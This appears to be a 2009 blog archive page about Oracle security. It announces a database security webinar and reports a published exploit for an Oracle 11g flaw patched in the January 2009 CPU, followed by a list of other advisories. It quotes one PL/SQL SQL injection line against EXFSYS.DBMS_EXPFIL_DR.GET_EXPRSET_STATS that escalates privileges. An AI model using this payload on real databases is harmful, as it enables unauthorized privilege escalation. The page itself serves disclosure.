Next Wednesday, 28. January 2009 (10:00 AM – 11:00 AM CET), I will give a free webinar „Best Practices for Database Security“ together with Sentrigo.
I will talk about typical problems in Oracle databases and how to avoid them…
See you next week…
Archive for Januar 21st, 2009
Webinar – Best Practices for Database Security
Mittwoch, Januar 21st, 2009Exploit for January CPU 2009 published
Mittwoch, Januar 21st, 2009Alexandr Polyakov, an Oracle security expert from Russia (reported findings in CPUJan2008, CPUJul2008 ), has posted details from one of his Oracle 11g findings on the webpage of dsecrg.com.
By using the following PLSQL fragment
exec EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS(‚EXFSYS‘,’EXF$VERSION‘,’EXFVER
SION‘,’YYYYYYY“ and 1=EVILPROC()–‚)
it is possible to escalate privileges via SQL Injection. More details (e.g. extract from v$sql) can be found in their advisory.
Other advisories for the January 2009 CPU cover other Oracle Products like BEA Application Server, Oracle E-Business Suite and
- Oracle EBusiness Suite Sensitive Information Disclosure Vulnerability
- Oracle Containers For Java Directory Traversal (OC4J) Oracle Application Server 10g (10.1.3.1.0) Oracle HTTP Server
- Oracle BEA Weblogic 10 – Multiple Linked XSS vulnerabilities
- Oracle Application Server (SOA) – Linked XSS vulnerability